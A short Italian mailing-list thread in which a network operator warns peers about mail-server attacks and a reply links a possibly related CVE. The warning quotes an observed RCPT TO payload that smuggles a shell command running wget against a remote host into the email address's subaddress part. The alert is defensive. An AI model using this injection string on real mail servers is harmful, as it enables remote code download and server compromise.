[ITNOG] tentativi sul server di posta

Gianluca Zamagni gianluca@parvati.it
Gio 27 Giu 2019 19:12:20 CEST


| Da: "Brian Turnbow via itnog" <itnog@lists.itnog.it>
| A: itnog@lists.itnog.it
| Inviato: Giovedì, 27 giugno 2019 19:10:09
| Oggetto: [ITNOG] tentativi sul server di posta

| Ciao a tutti

| Volevo avvisarvi che abbiamo nottato diversi email in arriva sui ns server di
| posta di un cosa che non avevo visto prima

| Sfrutta subaddressing nel user part del email cosi

| RCPT
| TO:<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20192.168.0.1\x2fstfinracu\x22}}@mydomain.it>

| ovvero

| <root+${run{/bin/ sh -c " wget 192.168.0.1/ stfinracu "}}@mydomain.it>

| Quindi tenta di lanciare un wget durante il routing del utente.

| Nostro non lo esegue, e l’ ip pubico non ci risponde e non so esattamente cosa
| tenta di fare, ma magari fate qualche controllo sui vs server per capire se
| siete vulnerabile.

Ciao Brian, 

forse un modo fantasioso di usare questo? 

[ https://www.cvedetails.com/cve/CVE-2019-5953/ | https://www.cvedetails.com/cve/CVE-2019-5953/ ] 

A presto 

Gianluca 
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://lists.itnog.it/pipermail/itnog/attachments/20190627/e37a98b2/attachment.html>


Maggiori informazioni sulla lista itnog